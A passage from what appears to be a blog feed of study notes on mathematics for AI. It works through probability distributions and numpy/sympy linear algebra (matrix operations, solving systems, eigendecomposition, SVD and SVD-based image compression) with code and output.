mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
mpl.rcParams['axes.unicode_minus'] = False
style.use('fivethirtyeight')
plt.rcParams["figure.figsize"] = (14, 7)
plt.figure(dpi=100) # raise the resolution to 100 dpi

# PDF (probability density function)
plt.plot(np.linspace(-4, 4, 100),
         stats.norm.pdf(np.linspace(-4, 4, 100))
         / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
         )
plt.fill_between(np.linspace(-4, 4, 100),
                 stats.norm.pdf(np.linspace(-4, 4, 100))
                 / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
                 alpha=.15,
                 )
# CDF (cumulative distribution function)
plt.plot(np.linspace(-4, 4, 100),
         stats.norm.cdf(np.linspace(-4, 4, 100)),
         )

# LEGEND
plt.text(x=-1.5, y=.7, s="pdf (normed)", rotation=65,
         alpha=.75, weight="bold", color="#008fd5")
plt.text(x=-.4, y=.5, s="cdf", rotation=55, alpha=.75,
         weight="bold", color="#fc4f30")

# TICKS
plt.tick_params(axis='both', which='major', labelsize=18)
plt.axhline(y=0, color='black', linewidth=1.3, alpha=.7)

# TITLE
plt.text(x=-5, y=1.25, s="Normal distribution - overview",
         fontsize=26, weight='bold', alpha=.75)
plt.text(x=-5, y=1.1,
         s=('The figure shows the normalized pdf and the cdf of a normal random variable '
            '$ y \sim \mathcal{N}(\mu,\sigma) $ with $ \mu = 0 $, $ \sigma = 1$.'),
         fontsize=19, alpha=.85)
Text(-5, 1.1, 'The figure shows the normalized pdf and the cdf of a normal random variable $ y \\sim \\mathcal{N}(\\mu,\\sigma) $ with $ \\mu = 0 $, $ \\sigma = 1$.')

[Figure: standard normal pdf (normalized) and cdf]

9.3 The Poisson Distribution

When n is large and p is small, the binomial distribution is well approximated by the Poisson distribution, which cuts down the computation

$$P\{X=k\}=C_n^k\left(\frac{\lambda}{n}\right)^k\left(1-\frac{\lambda}{n}\right)^{n-k}\approx \frac{\lambda^k}{k!}e^{-\lambda}$$

If $X$ follows the binomial distribution $b(n, p)$, then $X$ approximately follows the Poisson distribution with parameter $\lambda=np$

The Poisson distribution suits counts of random events over an interval of time (or space), e.g. the number of people arriving at a subway station in a given period. A quick numeric check of the approximation follows below.
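A minimal sketch comparing the two pmfs with scipy (n and p picked arbitrarily so that n is large and p is small):

from scipy.stats import binom, poisson

n, p = 1000, 0.01
lam = n * p
for k in (5, 10, 15):
    print(k, binom.pmf(k, n, p), poisson.pmf(k, lam))  # nearly equal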

9.6 The Beta Distribution

The Beta distribution can be viewed as a probability distribution over probabilities. This inference is really a posterior probability, which Bayes' rule turns into a computation over the prior:

$$f(p|X=k)=\frac{P(X=k|p)f(p)}{P(X=k)}$$

Definition 9.8  Given parameters $\alpha>0$ and $\beta>0$, a random variable $x$ taking values in $[0,1]$ has probability density

$$\mathrm{Beta}(x;\alpha,\beta)=\frac{1}{B(\alpha,\beta)}x^{\alpha-1}(1-x)^{\beta-1}$$

where $B(\alpha,\beta)$ is the Beta function, which can be written as

$$B(\alpha, \beta)=\frac{\Gamma(\alpha)\Gamma(\beta)}{\Gamma(\alpha+\beta)}$$

The Beta distribution has the following properties:

• Beta(1, 1) is the same as U(0, 1) (see the quick check after this list)

• As a probability distribution over probabilities, $\mathrm{Beta}(x;\alpha,\beta)$ integrates to 1 over x

• x is an estimate of the probability of some random event, and $\alpha-1$ and $\beta-1$ count how often the event did and did not occur

• The Beta distribution has the same distributional form for posterior and prior; only the parameters change

• It can be viewed as the distribution obtained from repeated binomial experiments, and lets us compute the distribution of an event's probability
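A minimal check of the first bullet with scipy:

import numpy as np
from scipy.stats import beta, uniform

x = np.linspace(0.01, 0.99, 5)
print(beta.pdf(x, 1, 1))  # all ones
print(uniform.pdf(x))     # all ones, so Beta(1, 1) coincides with U(0, 1)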

9.7 Worked Example: Estimating a Baseball Player's Batting Average

# IMPORTS
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import matplotlib.style as style
from IPython.core.display import HTML

# PLOTTING CONFIG
%matplotlib inline
style.use('fivethirtyeight')
plt.rcParams["figure.figsize"] = (14, 7)

plt.figure(dpi=100)

# PDF
# 82 hits, 220 misses
plt.plot(np.linspace(0, 1, 500),
         stats.beta.pdf(np.linspace(0, 1, 500), a=82, b=220), label='a=82,b=220',
         linewidth=1
         )

# 84 hits, 220 misses
plt.plot(np.linspace(0, 1, 500),
         stats.beta.pdf(np.linspace(0, 1, 500), a=84, b=220), label='a=84,b=220',
         linewidth=2, linestyle='dashed'
         )

# 182 hits, 420 misses
plt.plot(np.linspace(0, 1, 500),
         stats.beta.pdf(np.linspace(0, 1, 500), a=182, b=420), label='a=182,b=420',
         linewidth=3
         )

# AXIS LABELS
plt.xlabel('X', size=20)
plt.ylabel('Density of Beta', size=20)

# TICKS
plt.tick_params(axis='both', which='major', labelsize=18)
plt.xticks(np.linspace(0, 1, 11))

# SHOW TEXT IN CANVAS
plt.legend()

plt.show()

[Figure: Beta densities for (a, b) = (82, 220), (84, 220), (182, 420)]

9.9 Exercises

(1) For the standard normal random variable $X\sim N(0,1)$, suppose $P\{X < x_1\}=0.1$ and $P\{X < x_2\}=0.05$; the corresponding $x_1$, $x_2$ are called lower quantiles of the normal distribution. Find $x_1$ and $x_2$

$x_1 = \Phi^{-1}(0.1)$

$x_2 = \Phi^{-1}(0.05)$

    from scipy.stats import norm

x1 = norm.ppf(0.1) # inverse of the CDF (the percent-point function)
    x2 = norm.ppf(0.05)
    x1, x2
    (-1.2815515655446004, -1.6448536269514729)

(2) For the standard normal distribution $X\sim N(0,1)$, plot the normal curve and mark the lower 0.05 quantile

import matplotlib.pyplot as plt
from scipy.stats import norm
import numpy as np

x0 = norm.ppf(0.05) # the lower 0.05 quantile
y0 = norm.pdf(x0)   # density at that point
plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # draw the curve
plt.fill_between(np.linspace(-3, norm.ppf(0.05), 50),
                 norm.pdf(np.linspace(-3, norm.ppf(0.05), 50)),
                 alpha=.15,
                 )
plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5) # black dashed line at the quantile
plt.annotate("x2= %.2f" % x0, xy=(x0, y0), xycoords='data', xytext=(+30, +30),
             textcoords='offset points', fontsize=16, arrowprops=dict(arrowstyle='->',
             connectionstyle='arc3, rad=.2')) # annotation

plt.show() # show the figure


[Figure: standard normal pdf with the lower 0.05 tail shaded and x2 marked]

    ]]>
    @@ -10131,7 +10131,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80(5-6)/ - 正文:2 核心篇

5 Formalizing the Objects of Study: Linear Algebra Basics

5.3.3 Creating Matrices

Direct construction

    import numpy as np

    A = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]
    arr1 = np.array(A)
    print("A=", A)
    print("arr1=\n", arr1)
    B = ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))
    arr2 = np.array(B)
    print("B=", B)
    print("arr2=\n", arr2)

    print("type(A)=", type(A))
    print("type(B)=", type(B))
    print("type(arr1)=", type(arr1))
    print("arr1.shape=", arr1.shape)
A= [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]
arr1=
 [[ 1  2  3  4]
 [ 5  6  7  8]
 [ 9 10 11 12]]
B= ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))
arr2=
 [[ 1  2  3  4]
 [ 5  6  7  8]
 [ 9 10 11 12]]
type(A)= <class 'list'>
type(B)= <class 'tuple'>
type(arr1)= <class 'numpy.ndarray'>
arr1.shape= (3, 4)

Indirect construction

    import numpy as np

    arr1 = np.random.random((2, 3))
    print("arr1=\n", arr1)
arr2 = np.random.randint(3, 30, size=[2, 3]) # integers in [3, 30), 30 excluded
    print("arr2=\n", arr2)
arr1=
 [[0.7888749  0.29995777 0.79464025]
 [0.48565204 0.77377983 0.84873221]]
arr2=
 [[19 17  7]
 [ 4 25 14]]

Reshaping a matrix

    import numpy as np

    A = [1, 2, 3, 4, 5, 6]
    B = np.array(A)
    C1 = B.reshape(2, 3)
    C2 = B.reshape(3, 2)
    print("B=", B)
    print("C1=\n", C1)
    print("C2=\n", C2)
B= [1 2 3 4 5 6]
C1=
 [[1 2 3]
 [4 5 6]]
C2=
 [[1 2]
 [3 4]
 [5 6]]

Accessing matrix elements

C1[0]  # row 0
array([1, 2, 3])
C1[0:2]  # rows 0 to 2 (2 excluded)
array([[1, 2, 3],       [4, 5, 6]])
C2[[0, 2]]  # rows 0 and 2
array([[1, 2],       [5, 6]])
C2[:, 1]  # column 1
array([2, 4, 6])
C2[:, 0:2]  # columns 0 to 2 (2 excluded)
array([[1, 2],       [3, 4],       [5, 6]])
C1[:, [0, 2]]  # columns 0 and 2
array([[1, 3],       [4, 6]])
C2[2, 1]  # row 2, column 1
6
C2[2][1]  # row 2, column 1
6

5.3.4 Creating Vectors

    import numpy as np

    A = [[1, 2, 3, 4, 5]]
    B = [[1], [2], [3], [4], [5]]
    C = np.array(A)
    D = np.array(B)
    print("C=\n", C)
    print("D=\n", D)
    print("C.shape", np.shape(C))
    print("D.shape", np.shape(D))
C=
 [[1 2 3 4 5]]
D=
 [[1]
 [2]
 [3]
 [4]
 [5]]
C.shape (1, 5)
D.shape (5, 1)

5.4 Special Matrices

Zero matrix

    np.zeros(10)
    array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0.])
    np.zeros((2, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.]])
    np.array([np.zeros(10)])
    array([[0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]])

Identity matrix

    np.eye(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])
    np.identity(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])

Diagonal matrix

    arr1 = np.diag([1, 2, 3])
    arr1
    array([[1, 0, 0],       [0, 2, 0],       [0, 0, 3]])
    np.diag(arr1)
    array([1, 2, 3])

Upper and lower triangular matrices

    A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]])
    np.triu(A, 0)
    array([[ 1,  2,  3,  4],       [ 0,  6,  7,  8],       [ 0,  0, 11, 12],       [ 0,  0,  0, 16]])
    np.tril(A, 0)
    array([[ 1,  0,  0,  0],       [ 5,  6,  0,  0],       [ 9, 10, 11,  0],       [13, 14, 15, 16]])

Testing matrices for equality

    A = np.array([[1, 2, 3], [4, 5, 6]])
    B = np.array([1, 2, 3, 4, 5, 6]).reshape(2, 3)
    np.allclose(A, B)
    True

5.5 Basic Matrix Operations

5.5.3 Matrix Multiplication

    A = np.array([[1, 2], [1, 0]])
    B = np.diag([2, 2])
A.dot(B) # matrix product AB
    array([[2, 4],       [2, 0]])
A * B  # for np.array, * is elementwise multiplication
    array([[2, 0],       [0, 0]])
    np.multiply(A, B)
    array([[2, 0],       [0, 0]])
    A = np.mat([[1, 2], [1, 0]])
    B = np.mat(np.diag([2, 2]))
A * B # for np.mat, * is matrix multiplication
    matrix([[2, 4],        [2, 0]])

5.5.5 Matrix Powers

Only square matrices can be raised to a power. For the array type, a matrix power takes repeated dot calls; for the matrix type, ** does it directly (on arrays, ** raises each element to the n-th power). See the matrix_power sketch after the examples.

    A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    A_array = np.array(A)
    A_matrix = np.mat(A)
    A_array.dot(A_array).dot(A_array)
    array([[ 468,  576,  684],       [1062, 1305, 1548],       [1656, 2034, 2412]])
    A_array ** 3
    array([[  1,   8,  27],       [ 64, 125, 216],       [343, 512, 729]], dtype=int32)
    A_matrix ** 3
    matrix([[ 468,  576,  684],        [1062, 1305, 1548],        [1656, 2034, 2412]])
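For arrays there is also np.linalg.matrix_power, which avoids chaining dot calls; a minimal sketch:

import numpy as np

A_array = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
print(np.linalg.matrix_power(A_array, 3))  # same result as A_array.dot(A_array).dot(A_array)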

5.6.1 The Transpose

Building a symmetric matrix from a transpose

    import numpy as np

    arr1 = np.random.randint(1, 16, size=[3, 3])
    arr2 = np.triu(arr1)
    arr2 += arr2.T - np.diag(np.diag(arr2))

    print("arr1=\n", arr1)
    print("arr2=\n", arr2)
    print(np.allclose(arr2, arr2.T))
arr1=
 [[ 8 14 15]
 [13 13 12]
 [ 3  8 12]]
arr2=
 [[ 8 14 15]
 [14 13 12]
 [15 12 12]]
True

5.6.2 The Inverse

    import numpy as np

    A = [[1, 2], [2, 5]]
    C1 = np.array(A)
    C2 = np.mat(A)
C1_inverse = np.linalg.inv(C1) # the array type has no .I attribute
    C2_inverse = C2.I
    print("C1_inverse=\n", C1_inverse)
    print("C2_inverse=\n", C2_inverse)
    print("C1.dot(C1_inverse)=\n", C1.dot(C1_inverse))
C1_inverse=
 [[ 5. -2.]
 [-2.  1.]]
C2_inverse=
 [[ 5. -2.]
 [-2.  1.]]
C1.dot(C1_inverse)=
 [[1. 0.]
 [0. 1.]]
    C2 ** (-1)
    matrix([[ 5., -2.],        [-2.,  1.]])

A determinant of 0 means the transformation "collapses a dimension", and such a matrix is not invertible

try:
    np.mat([[0, 0], [0, 1]]) ** (-1)
except np.linalg.LinAlgError as e:
    print(e)
    Singular matrix

5.7.4 Computing the Determinant

np.linalg.det(np.diag([1, 2, 3, 4]))  # np.linalg is NumPy's linear-algebra module; the exact value is 24
    23.999999999999993

5.8.4 Matrix Rank

    np.linalg.matrix_rank(np.diag([1, 2, 3]))
    3
    np.linalg.matrix_rank(np.diag([1, 2, 0]))
    2

5.9.1 The Inner Product

    A = [[1, 2, 3]]
    B = [[4, 5, 6]]
C1 = np.array(A).reshape(3, 1) # convert to column vectors
    C2 = np.array(B).reshape(3, 1)
    np.dot(C1.T, C2)
    array([[32]])

5.9.2 Vector Length (Norm)

    A = np.array([[0, 3, 4]])
    np.linalg.norm(A)
    5.0

5.9.4 Orthonormal Bases

Definition 5.17  A complex matrix satisfying $A^HA=AA^H=E$ is called a unitary matrix.
Unitary matrices appear frequently in the singular value decomposition (SVD); an orthogonal matrix is the real-valued special case of a unitary matrix. A quick numeric check follows.
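A minimal sketch checking the real case (the Q factor of a QR factorization is orthogonal, so $Q^TQ=E$):

import numpy as np

Q, _ = np.linalg.qr(np.random.rand(3, 3))  # Q from QR is orthogonal
print(np.allclose(Q.T @ Q, np.eye(3)))     # True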

Worked Example: Linear Algebra in Practical Problems

Solve the system of equations:

$$
\left\{\begin{matrix}
x + 2y + z = 7 \\
2x - y + 3z = 7 \\
3x + y + 2z = 18
\end{matrix}\right.
$$

    import numpy as np

    A = np.mat([[1, 2, 1], [2, -1, 3], [3, 1, 2]])
    B = np.mat([7, 7, 18]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[ 1,  2,  1,  7],        [ 2, -1,  3,  7],        [ 3,  1,  2, 18]])

1 Using the inverse: for $AX=B$, $X=A^{-1}B$

    X = A.I * B
    X
    matrix([[ 7.],        [ 1.],        [-2.]])
A * X  # verify
    matrix([[ 7.],        [ 7.],        [18.]])

2 Using np.linalg.solve()

    np.linalg.solve(A, B)
    matrix([[ 7.],        [ 1.],        [-2.]])

3 Using SymPy's solve function

    import sympy
    from sympy.abc import x, y, z

eq = [x + 2 * y + z - 7,
      2 * x - y + 3 * z - 7,
      3 * x + y + 2 * z - 18]
    sympy.solve(eq, [x, y, z])
    {x: 7, y: 1, z: -2}

Solving a system with infinitely many solutions

$$
\left\{\begin{matrix}
x + 2y + z - 2w = 0 \\
2x + 3y - w = 0 \\
x - y - 5z + 7w = 0
\end{matrix}\right.
$$

    import numpy as np

A = np.array([[1, 2, 1, -2],
              [2, 3, 0, -1],
              [1, -1, -5, 7]])
    np.linalg.matrix_rank(A)
    2
    import sympy
    from sympy.abc import x, y, z, w

    eq = [x + 2 * y + z - 2 * w, 2 * x + 3 * y - w, x - y - 5 * z + 7 * w]
    result = sympy.solve(eq, [x, y, z, w])
    result
    {x: -4*w + 3*z, y: 3*w - 2*z}
vals = {z: 1, w: 2}  # pick values for the free parameters (avoid reusing the name A)
x = float(result[x].evalf(subs=vals))
y = float(result[y].evalf(subs=vals))
    x, y
    (-5.0, 4.0)

Example 5.18  Loading a dataset by reading a csv file

    import pandas as pd
    import numpy as np

    dataset = pd.read_csv("iris.csv")
    data = np.array(dataset)

5.12 Exercises

    (1)

Solve the linear system using three different methods

$$
\left\{\begin{matrix}
x+y+z=2 \\
x+2y+4z=3 \\
x+3y+9z=5
\end{matrix}\right.
$$

    1
    import numpy as np

A = np.mat([[1, 1, 1],
            [1, 2, 4],
            [1, 3, 9]])
    B = np.mat([2, 3, 5]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[1, 1, 1, 2],        [1, 2, 4, 3],        [1, 3, 9, 5]])
    A.I * B
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    2
    np.linalg.solve(A, B)
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    3
    import sympy
    from sympy.abc import x, y, z

    eq = [x + y + z - 2, x + 2 * y + 4 * z - 3, x + 3 * y + 9 * z - 5]
    sympy.solve(eq, [x, y, z])
    {x: 2, y: -1/2, z: 1/2}

    (2)

Create a 3 × 4 and a 4 × 5 matrix with random integer entries from 1 to 20, compute the product of the two matrices, and find the rank of each

    import numpy as np

    A = np.random.randint(1, 20, size=[3, 4])
    B = np.random.randint(1, 20, size=[4, 5])
    A, B
    (array([[ 2, 18, 16,  6],        [19,  1, 12, 19],        [11,  9, 18, 17]]), array([[ 7, 14, 14, 14,  6],        [11, 10, 11,  8, 10],        [ 4,  3,  8,  4, 11],        [11, 10, 14,  1,  3]]))
    A.dot(B)
    array([[342, 316, 438, 242, 386],       [401, 502, 639, 341, 313],       [435, 468, 635, 315, 405]])
    np.linalg.matrix_rank(A)
    3
    np.linalg.matrix_rank(B)
    4

    (3)

Find the inverse of the matrix below; first compute the determinant — the inverse exists only when the determinant is nonzero — and then invert

$$
A=\begin{bmatrix}
1 & 2 & 3 \\
2 & 2 & 1 \\
3 & 4 & 3
\end{bmatrix}
$$

    import numpy as np

A = np.mat([[1, 2, 3],
            [2, 2, 1],
            [3, 4, 3]])
    np.linalg.det(A)
    1.9999999999999993
    A.I
    matrix([[ 1. ,  3. , -2. ],        [-1.5, -3. ,  2.5],        [ 1. ,  1. , -1. ]])

    (4)

Create a 4 × 4 zero matrix, a 4 × 4 identity matrix, and a diagonal matrix with diagonal entries 1, 2, 3, 4

    np.zeros((4, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])
    np.identity(4)
    array([[1., 0., 0., 0.],       [0., 1., 0., 0.],       [0., 0., 1., 0.],       [0., 0., 0., 1.]])
    np.diag([1, 2, 3, 4])
    array([[1, 0, 0, 0],       [0, 2, 0, 0],       [0, 0, 3, 0],       [0, 0, 0, 4]])

    (5)

Create a 4 × 4 matrix of random floats in 1~20, then build the symmetric matrices corresponding to its upper and lower triangular parts

    A = np.random.random(16).reshape(4, 4) * 20
    A
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [11.80703601, 11.72735218,  7.43395284, 14.95671889],       [18.40134451, 17.69715348, 14.43624563,  4.31954707],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])
    np.triu(A)
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 0.        , 11.72735218,  7.43395284, 14.95671889],       [ 0.        ,  0.        , 14.43624563,  4.31954707],       [ 0.        ,  0.        ,  0.        , 11.79353701]])
    np.triu(A).T + np.triu(A) - np.diag(np.diag(A))
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 3.99280371, 11.72735218,  7.43395284, 14.95671889],       [13.3828697 ,  7.43395284, 14.43624563,  4.31954707],       [13.32337192, 14.95671889,  4.31954707, 11.79353701]])
    np.tril(A).T + np.tril(A) - np.diag(np.diag(A))
    array([[14.08629999, 11.80703601, 18.40134451, 11.07252469],       [11.80703601, 11.72735218, 17.69715348,  7.31171911],       [18.40134451, 17.69715348, 14.43624563, 16.52018505],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])

6 Extracting Important Information from Data: Eigenvalues and Matrix Factorizations

6.1.4 Computing Eigenvalues

Given
$$A=
\begin{bmatrix}
4 & 2 \\
1 & 5
\end{bmatrix}
$$
find the eigenvalues and eigenvectors of A

$|A-\lambda E|=
\begin{vmatrix}
4- \lambda & 2\\
1 & 5 - \lambda
\end{vmatrix}=0$

$(4 - \lambda)(5 - \lambda) - 2 = 0$

$\lambda ^ 2 - 9\lambda + 18 = 0$

Eigenvalues: $\lambda_1 = 3$, $\lambda_2 = 6$

$A - 3E =
\begin{bmatrix}
1 & 2\\
1 & 2
\end{bmatrix} \to$ eigenvector $(-2, 1)^T$, which normalizes to $(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$

$A - 6E =
\begin{bmatrix}
-2 & 2\\
1 & -1
\end{bmatrix} \to$ eigenvector $(1, 1)^T$, which normalizes to $(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    import numpy as np

    A = np.array([[4, 2], [1, 5]])
eig_val, eig_vex = np.linalg.eig(A) # eig() returns the eigenvalues and the eigenvector matrix
eig_val  # the eigenvalues
array([3., 6.])
eig_vex  # the eigenvector matrix (columns already normalized)
    array([[-0.89442719, -0.70710678],       [ 0.4472136 , -0.70710678]])

which gives the eigenvectors $(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$ and $(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

6.3 Eigendecomposition

Eigendecomposition factors a matrix $A$ as $A=Q\Sigma Q^{-1}$, which requires $A$ to be an n × n square matrix; generalizing the idea to arbitrary matrices gives the more general singular value decomposition (SVD). A minimal reconstruction check follows.
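A minimal sketch verifying $A=Q\Sigma Q^{-1}$ with numpy, reusing the matrix from 6.1.4:

import numpy as np

A = np.array([[4, 2], [1, 5]])
vals, Q = np.linalg.eig(A)
Lam = np.diag(vals)                                # eigenvalues on the diagonal
print(np.allclose(Q @ Lam @ np.linalg.inv(Q), A))  # True: A == Q Sigma Q^{-1}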

6.4 Singular Value Decomposition (SVD)

• Somehow this topic never came up in my undergraduate courses or the graduate entrance exam... probably because the computation is so heavy

• Reference tutorial: 【学长小课堂】什么是奇异值分解 SVD–SVD 如何分解时空矩阵

• SVD factors an arbitrary matrix into a product of three matrices, written $A=U\Sigma V^T$

• $U$ and $V$ are orthogonal matrices whose columns are eigenvectors of $AA^T$ and $A^TA$ respectively; $\Sigma$ is a diagonal matrix whose diagonal entries are the singular values of $A$ in descending order, where singular value$^2$ = eigenvalue of $A^TA$

• Viewing $A$ as a linear transformation, the SVD splits it into a rotation $U$, a scaling $\Sigma$, and a rotation $V^T$

• Singular values are nonnegative reals

• Theorem: for any two matrices A and B (of any sizes, as long as both products AB and BA are defined), AB and BA have the same nonzero eigenvalues with the same multiplicities, and the eigenvectors for the nonzero eigenvalues are related. This is why A^TA and AA^T have the same eigenvalues.

$$A_{m \times n} = U_{m \times m}\Sigma_{m \times n}V_{n \times n}^T$$
$$
\begin{bmatrix}
0 & 1\\
1 & 1\\
1 & 0
\end{bmatrix}=
\begin{bmatrix}
1/\sqrt6 & 1/\sqrt2 & 1/\sqrt3\\
2/\sqrt6 & 0 & -1/\sqrt3\\
1/\sqrt6 & -1/\sqrt2 & 1/\sqrt3
\end{bmatrix}
\begin{bmatrix}
\sqrt3 & 0\\
0 & 1\\
0 & 0
\end{bmatrix}
\begin{bmatrix}
1/\sqrt2 & 1/\sqrt2\\
-1/\sqrt2 & 1/\sqrt2
\end{bmatrix}
$$

    import numpy as np

    # A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A = np.array([[0, 1], [1, 1], [1, 0]]) # https://zhuanlan.zhihu.com/p/29846048
    A
    array([[0, 1],       [1, 1],       [1, 0]])

SVD from the definition

AAT = A.dot(A.T) # A A^T, whose eigenvectors give the left singular matrix
sigmal_val, U = np.linalg.eigh(AAT)  # eigenvalues and the left singular matrix
sigmal_sort_id = np.argsort(sigmal_val)[::-1] # indices of the eigenvalues in descending order
sigmal_val = np.sort(sigmal_val)[::-1] # sort the eigenvalues in descending order
U = U[:, sigmal_sort_id] # reorder the eigenvector columns the same way
sigmal = np.diag(np.sqrt(sigmal_val)) # the (square) singular value matrix
sigmal_inv = np.linalg.inv(sigmal) # inverse of the singular value matrix
V_part_T = sigmal_inv.dot(U.T).dot(A) # (part of) the right singular matrix

print("AAT=:\n", AAT)
print("Left singular matrix: \n", U)
print("Singular value matrix: \n", np.round(sigmal, 2))
print("Right singular matrix transpose (partial):\n", np.round(V_part_T, 6))
AAT=:
 [[1 1 0]
 [1 2 1]
 [0 1 1]]
Left singular matrix: 
 [[ 4.08248290e-01 -7.07106781e-01  5.77350269e-01]
 [ 8.16496581e-01 -7.58447699e-17 -5.77350269e-01]
 [ 4.08248290e-01  7.07106781e-01  5.77350269e-01]]
Singular value matrix: 
 [[1.73 0.   0.  ]
 [0.   1.   0.  ]
 [0.   0.   0.  ]]
Right singular matrix transpose (partial):
 [[ 0.707107  0.707107]
 [ 0.707107 -0.707107]
 [ 0.        0.      ]]
    np.round(U.dot(sigmal).dot(V_part_T), 2)
    array([[0., 1.],       [1., 1.],       [1., 0.]])

I'll stop digging here — it's a slog. No wonder the entrance exam skips it: even the computer grinds away for a while, never mind doing it by hand

SVD with numpy.linalg.svd

U, s, VT = np.linalg.svd(A)
Sigma = np.zeros(np.shape(A)) # start from a zero matrix
Sigma[:len(s), :len(s)] = np.diag(s) # put the singular values on its diagonal
print("Left singular matrix: \n", U)
print("Singular values:\n", s)
print("Singular value matrix: \n", Sigma)
print("Right singular matrix transpose:\n", VT)
Left singular matrix: 
 [[-4.08248290e-01  7.07106781e-01  5.77350269e-01]
 [-8.16496581e-01  5.55111512e-17 -5.77350269e-01]
 [-4.08248290e-01 -7.07106781e-01  5.77350269e-01]]
Singular values:
 [1.73205081 1.        ]
Singular value matrix: 
 [[1.73205081 0.        ]
 [0.         1.        ]
 [0.         0.        ]]
Right singular matrix transpose:
 [[-0.70710678 -0.70710678]
 [-0.70710678  0.70710678]]
    np.round(U.dot(Sigma).dot(VT), 2)
    array([[ 0.,  1.],       [ 1.,  1.],       [ 1., -0.]])

6.5.4 Matrix Approximation with the SVD

For the matrix A below, the SVD yields two large leading eigenvalues (343 and 25, i.e. the squared singular values) and one small one (3.37). By varying k — taking the first k columns of $U$, shrinking $\Sigma$ to its leading k × k block, and taking the first k rows of $V^T$ — we compare the matrix rebuilt from the product against the original data

    import numpy as np

    A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A
    array([[ 1,  5,  7,  6,  1],       [ 2,  1, 10,  4,  4],       [ 3,  6,  7,  5,  2]])
    U, s, VT = np.linalg.svd(A)
Sigma = np.zeros(np.shape(A)) # start from a zero matrix
Sigma[:len(s), :len(s)] = np.diag(s) # put the singular values on its diagonal

for k in range(3, 0, -1):
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    print("k=", k, "compressed matrix: \n", np.round(D, 1))
k= 3 compressed matrix: 
 [[ 1.  5.  7.  6.  1.]
 [ 2.  1. 10.  4.  4.]
 [ 3.  6.  7.  5.  2.]]
k= 2 compressed matrix: 
 [[ 2.   5.4  6.8  5.3  1.5]
 [ 2.   1.  10.   4.   4. ]
 [ 2.1  5.7  7.2  5.6  1.5]]
k= 1 compressed matrix: 
 [[1.9 3.8 7.7 4.8 2.3]
 [2.1 4.1 8.2 5.1 2.4]
 [2.  4.  8.1 5.  2.4]]

By choosing a suitable k and keeping only the larger singular values and their vectors, we get a good approximation of the matrix from much less data. The sketch below quantifies this with the relative reconstruction error.
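A minimal sketch (reusing A, U, Sigma and VT from above) measuring the relative Frobenius-norm error of each rank-k reconstruction:

for k in range(3, 0, -1):
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    rel_err = np.linalg.norm(A - D) / np.linalg.norm(A)  # Frobenius norm by default
    print("k=%d  relative error=%.4f" % (k, rel_err))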

6.6 Worked Example 1: Compressing an Image with the SVD

from PIL import Image
import numpy as np
import matplotlib.pyplot as plt


def get_approx_SVD1(data, percent):
    """
    SVD, then rebuild the data keeping a percentage of the total singular value sum
    :param data: original matrix
    :param percent: percentage of the singular value sum to keep
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    count = int(sum(s)) * percent # target share of the total singular value sum
    k = -1 # number of singular values needed to reach that share
    curSum = 0 # running sum of kept singular values
    while curSum <= count: # while the kept sum is below the target:
        k += 1
        curSum += s[k]
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :])) # first k columns of U, leading k x k block of Sigma, first k rows of VT
    D[D < 0] = 0 # clamp to the valid color range
    D[D > 255] = 255
    # numpy.rint() rounds each element to the nearest integer
    return np.rint(D).astype("uint8")


def get_approx_SVD2(data, percent):
    """
    SVD, then rebuild the data keeping a percentage of the number of singular values
    :param data: original matrix
    :param percent: percentage of the singular values (by count) to keep
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    k = int(percent * len(s)) # keep the k largest singular values
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    D[D < 0] = 0
    D[D > 255] = 255
    return np.rint(D).astype("uint8")


def rebuild_img(filename, p, get_approx_SVD, index):
    """
